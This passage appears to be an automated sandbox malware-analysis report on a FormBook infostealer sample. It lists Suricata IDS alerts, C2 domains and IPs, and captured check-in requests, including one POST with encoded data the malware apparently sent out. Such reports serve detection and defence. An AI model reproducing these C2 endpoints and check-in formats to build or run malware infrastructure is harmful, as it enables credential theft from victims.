            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:57212 -> 34.149.87.45:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:57220 -> 34.149.87.45:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:57218 -> 91.203.110.247:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:57210 -> 13.248.151.237:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:57219 -> 91.203.110.247:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:57219 -> 91.203.110.247:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:57209 -> 13.248.151.237:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:57240 -> 72.52.178.23:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:57233 -> 199.59.243.226:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:57222 -> 34.149.87.45:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:57240 -> 72.52.178.23:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:57208 -> 13.248.151.237:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:57213 -> 34.149.87.45:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:57225 -> 72.52.178.23:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:57223 -> 34.149.87.45:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:57223 -> 34.149.87.45:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:57235 -> 199.59.243.226:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:57235 -> 199.59.243.226:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:57216 -> 91.203.110.247:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:57226 -> 72.52.178.23:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:57227 -> 72.52.178.23:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:57227 -> 72.52.178.23:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:57230 -> 199.59.243.226:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:57236 -> 199.59.243.226:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:57236 -> 199.59.243.226:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:57221 -> 34.149.87.45:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:57192 -> 72.52.178.23:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:57232 -> 199.59.243.226:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:57239 -> 72.52.178.23:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:57228 -> 199.59.243.226:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:57214 -> 34.149.87.45:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:57237 -> 72.52.178.23:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:57197 -> 15.197.240.20:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:57238 -> 72.52.178.23:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:57217 -> 91.203.110.247:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:57231 -> 199.59.243.226:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:57231 -> 199.59.243.226:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:57229 -> 199.59.243.226:80
            Source: Joe Sandbox ViewIP Address: 72.52.178.23 72.52.178.23
            Source: Joe Sandbox ViewIP Address: 72.52.178.23 72.52.178.23
            Source: Joe Sandbox ViewIP Address: 162.0.213.94 162.0.213.94
            Source: Joe Sandbox ViewASN Name: LIQUIDWEBUS LIQUIDWEBUS
            Source: Joe Sandbox ViewASN Name: ACPCA ACPCA
            Source: Joe Sandbox ViewASN Name: TANDEMUS TANDEMUS
            Source: Joe Sandbox ViewASN Name: BODIS-NJUS BODIS-NJUS
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: C:\Users\user\Desktop\0XLuA614VK.exeCode function: 0_2_00F9CE44 InternetReadFile,SetEvent,GetLastError,SetEvent,0_2_00F9CE44
            Source: global trafficHTTP traffic detected: GET /wuux/?sH=nVVHdDTx2PSTVJ&V6h=G8W1V2+ngxJ+E83/0IyfiXupIqoHasoRgPgAY3+/EHQIvd2Wul84Lo8VWixQDtg5AMG3Phy0eNTP33PkrrD0t0eGx0WSmGJ1HH0cwOwxD95TaQSaBMeTfZ443OH1gA0wDQ== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-USHost: www.whiskeydecanterset.comConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0
            Source: global trafficHTTP traffic detected: GET /f1qc/?V6h=hzwN5LvsQYGPXTyx42WRS7uCqzLBy6ud4OZoJGct5lGhQCi/JqvYfzOI1V2uJBuqGZjzCjoJ029vt64MfCw2DjbXOZQ5rAFnHlGKde1l7O/bIsy3YWShbixw9PLvmnDlNA==&sH=nVVHdDTx2PSTVJ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-USHost: www.4odagiyn.clickConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0
            Source: global trafficHTTP traffic detected: GET /n4sv/?V6h=Rn8sYt8YDaYT7jFf5K1RN21751bCn2USuvRVR0XZr3jMl4ljVezIqMhPdYzWo0QynoEEVao5Nd7ZkOoeHk8KzYmVnd6lY3cEc8VkS42gD8QuE3e2/CTNStdnS6k5rMWW1Q==&sH=nVVHdDTx2PSTVJ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-USHost: www.marinamaquiagens.onlineConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0
            Source: global trafficHTTP traffic detected: GET /iuti/?V6h=hoHbkVcpbob4KKGwTSg4Qmxuxm4KO3ujR6NVpJZRiS90gufBWzA0W/yR6JGFw3H3NTWRULQgnx1gCbPTi357oLTiVxRhMsTUHJ+Wl6jWlVJ6tv3Z5Sqw5Cg13CqV209vow==&sH=nVVHdDTx2PSTVJ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-USHost: www.yi992.comConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0
            Source: global trafficHTTP traffic detected: GET /ig9u/?V6h=DsbZHDl7ETyucOGSRMDREU0gLqon/JCM1qPnn3cy3RxLEFGk9lVuu2W6wSDxGu+YER8koFm75cmrGcIzTbmZQ3LhDYrene07E1oxIZlh9GtUu7RZMRKLFDCiJnSgV5dMHg==&sH=nVVHdDTx2PSTVJ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-USHost: www.rigintech.infoConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0
            Source: global trafficHTTP traffic detected: GET /r6tm/?sH=nVVHdDTx2PSTVJ&V6h=03r06RSocIWRHlQMBHZ7/ZdxuKKmGlmlv7BltFVQgkYFIdRnDBF7O8WDu3tP30gBrpd5Hehkjcnr6TVmd9giBmXATSrzqLCUTktLP3Nid+3n62oF5w/Mdat6l5CFzOydDA== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-USHost: www.bnmlk.orgConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0
            Source: global trafficHTTP traffic detected: GET /ld3u/?V6h=7cSyNGFy/S5quoM6udyikngV4L2ptvlq1/kf9BPZtTlwCENfjvle2IZfxcv5JQLEZFLmm1935WPn1s0g14qVusJPQGgEr6+5yVxfblixZgca2mD/C/dkht+8dQzCD1+Jew==&sH=nVVHdDTx2PSTVJ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-USHost: www.smokesandhoney.comConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0
            Source: global trafficHTTP traffic detected: GET /ccpi/?sH=nVVHdDTx2PSTVJ&V6h=96vdCLF6vzOjbBC3mbkrC4zzUz2rd8Vx/oWpiC2btghNh3zo1JohGtlH0OSuyloWV4aL4gulV88Z8WUGiHxG/5dbitedT3dwls/KnYRS+O7Xw5tFmWV2oMBDB9F7a8JBDA== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-USHost: www.wildenmann.shopConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0
            Source: global trafficHTTP traffic detected: GET /lztc/?V6h=7O2Vi30c2oKUz/gZ0nmLwDIgwhZodI9AolnTqJiIqHlz4L2fxMx7xnfeqZW9vH+mS4f3qWyrmk5EaMabwLfk8B7yJXbJanTlK0OvtO++wyfSRGRbh4BKfAxEuo7imst0wg==&sH=nVVHdDTx2PSTVJ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-USHost: www.formytinyhome.comConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0
            Source: global trafficHTTP traffic detected: GET /kfsd/?sH=nVVHdDTx2PSTVJ&V6h=xdt0ktZO0PUVE8ko/vYSpSqVpvi6VCO8XncayCS9euW1eL9fqbwTWogO+vBLUJXWpdaX6FBHI3PARBJ6BBwlCmNGVSn5FdlKflrneiv2THCpchPWcIBHiIkx6LHBCpUWbA== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-USHost: www.5a8yly.cfdConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0
            Source: global trafficHTTP traffic detected: GET /2hp8/?V6h=CrdAdyOI+okqqhNVS+pkNdIVKBAkN6pudTJL4uhGXJF2xfVUvgIf08oiVWpA0tvbrxzjqgxPP30FNCXR+uyv/IzX8n7qYYw/tQbLXhwufDNvpebHNpaSdeQxoKtamMn3yA==&sH=nVVHdDTx2PSTVJ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-USHost: www.thecivilwearsprada06.siteConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0
            Source: global trafficHTTP traffic detected: GET /ssw0/?V6h=EWS2YwJnJiunoUuFc/7D9RbaJ3v4wM/73ZiSCzwa3KkaAEYrAxr2MHaEXaA/BV5/vIbe5XGczNGh+M2iNsrtVcMRpqBE9VdECLv8jlI9PFfIoqokrAMGKtNOgnbIBrYWGQ==&sH=nVVHdDTx2PSTVJ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-USHost: www.cacingnaga36.clickConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0
            Source: global trafficHTTP traffic detected: GET /wuux/?sH=nVVHdDTx2PSTVJ&V6h=G8W1V2+ngxJ+E83/0IyfiXupIqoHasoRgPgAY3+/EHQIvd2Wul84Lo8VWixQDtg5AMG3Phy0eNTP33PkrrD0t0eGx0WSmGJ1HH0cwOwxD95TaQSaBMeTfZ443OH1gA0wDQ== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-USHost: www.whiskeydecanterset.comConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0
            Source: global trafficHTTP traffic detected: GET /f1qc/?V6h=hzwN5LvsQYGPXTyx42WRS7uCqzLBy6ud4OZoJGct5lGhQCi/JqvYfzOI1V2uJBuqGZjzCjoJ029vt64MfCw2DjbXOZQ5rAFnHlGKde1l7O/bIsy3YWShbixw9PLvmnDlNA==&sH=nVVHdDTx2PSTVJ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-USHost: www.4odagiyn.clickConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0
            Source: global trafficDNS traffic detected: DNS query: www.whiskeydecanterset.com
            Source: global trafficDNS traffic detected: DNS query: 198.187.3.20.in-addr.arpa
            Source: global trafficDNS traffic detected: DNS query: www.4odagiyn.click
            Source: global trafficDNS traffic detected: DNS query: www.shimakaze-83.cfd
            Source: global trafficDNS traffic detected: DNS query: www.marinamaquiagens.online
            Source: global trafficDNS traffic detected: DNS query: www.sandiegosharon.com
            Source: global trafficDNS traffic detected: DNS query: www.yi992.com
            Source: global trafficDNS traffic detected: DNS query: www.ios2222abh.top
            Source: global trafficDNS traffic detected: DNS query: www.rigintech.info
            Source: global trafficDNS traffic detected: DNS query: www.bnmlk.org
            Source: global trafficDNS traffic detected: DNS query: www.smokesandhoney.com
            Source: global trafficDNS traffic detected: DNS query: www.wildenmann.shop
            Source: global trafficDNS traffic detected: DNS query: www.formytinyhome.com
            Source: global trafficDNS traffic detected: DNS query: www.5a8yly.cfd
            Source: global trafficDNS traffic detected: DNS query: www.thecivilwearsprada06.site
            Source: global trafficDNS traffic detected: DNS query: www.sugargz.com
            Source: global trafficDNS traffic detected: DNS query: www.cacingnaga36.click
            Source: unknownHTTP traffic detected: POST /f1qc/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Encoding: gzip, deflate, brAccept-Language: en-USHost: www.4odagiyn.clickConnection: closeContent-Length: 204Content-Type: application/x-www-form-urlencodedCache-Control: max-age=0Origin: http://www.4odagiyn.clickReferer: http://www.4odagiyn.click/f1qc/User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0Data Raw: 56 36 68 3d 73 78 59 74 36 37 50 59 64 70 50 77 58 6a 4b 78 30 45 2b 36 51 4c 79 48 68 78 69 59 75 36 72 69 77 50 68 4a 46 6b 31 36 30 6e 50 7a 44 41 50 5a 57 34 33 31 61 42 4b 46 38 43 54 38 4f 6a 66 6a 41 4c 69 78 4d 52 38 2b 74 32 6c 63 30 4b 55 4c 56 69 30 74 4f 6e 76 31 62 75 30 41 6e 44 4d 72 55 48 72 68 63 70 64 57 33 72 50 46 42 72 36 45 63 7a 75 57 52 78 74 43 78 66 6a 61 73 46 36 6f 66 6c 73 66 7a 57 47 50 5a 6d 48 58 51 54 46 66 69 6c 79 39 6b 67 4d 44 77 66 4a 68 32 63 61 62 64 75 7a 2f 51 50 58 71 66 71 37 73 62 64 4e 71 39 73 52 6a 76 30 53 67 6d 74 49 4a 51 4d 49 38 33 66 43 50 33 4c 49 3d Data Ascii: V6h=sxYt67PYdpPwXjKx0E+6QLyHhxiYu6riwPhJFk160nPzDAPZW431aBKF8CT8OjfjALixMR8+t2lc0KULVi0tOnv1bu0AnDMrUHrhcpdW3rPFBr6EczuWRxtCxfjasF6oflsfzWGPZmHXQTFfily9kgMDwfJh2cabduz/QPXqfq7sbdNq9sRjv0SgmtIJQMI83fCP3LI=
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 05 Sep 2024 12:25:50 GMTServer: ApacheContent-Length: 16052Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 68 65 69 67 68 74 3d 22 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 77 69 64 74 68 3d 22 35 34 31 2e 31 37 32 30 36 22 0a 20 20 20 20 20 69 64 3d 22 73 76 67 32 22 0a 20 20 20 20 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 64 61 74 61 0a 20 20 20 20 20 20 20 69 64 3d 22 6d 65 74 61 64 61 74 61 38 22 3e 0a 20 20 20 20 3c 2f 6d 65 74 61 64 61 74 61 3e 0a 20 20 20 20 3c 64 65 66 73 0a 20 20 20 20 20 20 20 69 64 3d 22 64 65 66 73 36 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 74 65 72 6e 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 0a 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 2e 35 22 0a 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 30 2c 30 29 20 73 63 61 6c 65 28 31 30 2c 31 30 29 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 53 74 72 69 70 73 32 5f 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 72 65 63 74 0a 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 62 6c 61 63 6b 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 78 3d 22 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 79 3d 22 2d 30 2e 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 35 34 31 39 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 70 61 74 74 65 72 6e 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 0a 20 20 20 20 20 20 20 20 20 6f 73 62 3a 70 61 69 6e 74 3d 22 73 6f 6c 69 64 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 36 30 39 36 22 3e
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 05 Sep 2024 12:25:53 GMTServer: ApacheContent-Length: 16052Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 68 65 69 67 68 74 3d 22 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 77 69 64 74 68 3d 22 35 34 31 2e 31 37 32 30 36 22 0a 20 20 20 20 20 69 64 3d 22 73 76 67 32 22 0a 20 20 20 20 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 64 61 74 61 0a 20 20 20 20 20 20 20 69 64 3d 22 6d 65 74 61 64 61 74 61 38 22 3e 0a 20 20 20 20 3c 2f 6d 65 74 61 64 61 74 61 3e 0a 20 20 20 20 3c 64 65 66 73 0a 20 20 20 20 20 20 20 69 64 3d 22 64 65 66 73 36 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 74 65 72 6e 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 0a 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 2e 35 22 0a 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 30 2c 30 29 20 73 63 61 6c 65 28 31 30 2c 31 30 29 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 53 74 72 69 70 73 32 5f 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 72 65 63 74 0a 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 62 6c 61 63 6b 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 78 3d 22 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 79 3d 22 2d 30 2e 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 35 34 31 39 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 70 61 74 74 65 72 6e 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 0a 20 20 20 20 20 20 20 20 20 6f 73 62 3a 70 61 69 6e 74 3d 22 73 6f 6c 69 64 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 36 30 39 36 22 3e
